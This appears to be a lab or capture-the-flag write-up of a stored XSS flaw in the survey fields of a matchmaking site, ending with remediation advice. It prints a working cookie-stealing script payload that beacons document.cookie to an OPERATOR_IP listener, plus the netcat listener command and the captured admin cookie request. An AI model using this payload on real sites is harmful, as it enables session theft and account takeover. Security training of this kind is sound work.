Stored XSS survey payload steals admin session cookie
Foundations web engagement: matchmaking survey reflected/stored attacker HTML; a fetch beacon exfiltrated the admin cookie to an operator listener.
- Case files
- Stored XSS survey payload steals admin session cookie
Survey fields accepted a script tag that fired when admin reviewed submissions; document.cookie hit the operator listener.
Injected fetch XSS; listener received the admin cookie.
Engagement summary
Survey fields accepted a script tag that fired when admin reviewed submissions; document.cookie hit the operator listener.
CUPID’S MATCHMAKER exposed a survey-driven matchmaking UI and an /admin review surface. User-controlled survey fields were rendered without encoding. A payload that fetched the operator host with document.cookie executed in the admin browser context when the submission was opened, delivering the session cookie to nc on port 8000. Replaying that cookie unlocked admin-only content.
Business impact
Stored XSS against privileged reviewers is account takeover. Encode all output, set HttpOnly/Secure/SameSite on session cookies, deploy a strict CSP, and sanitize rich text on input.
Beacon payload and cookie capture
Injected fetch XSS; listener received the admin cookie.
PAYLOAD
survey-xss.html
<script>fetch('http://OPERATOR_IP:8000/?c='+document.cookie)</script>OPERATOR · XSS
savvy@lab:~$ nc -lnvp 8000
# submit survey with XSS payload; wait for admin review
GET /?c=session=<admin_cookie> HTTP/1.1
Remediation
Context-aware encoding, CSP with nonces, HttpOnly cookies, and admin MFA. Treat any stored HTML as untrusted.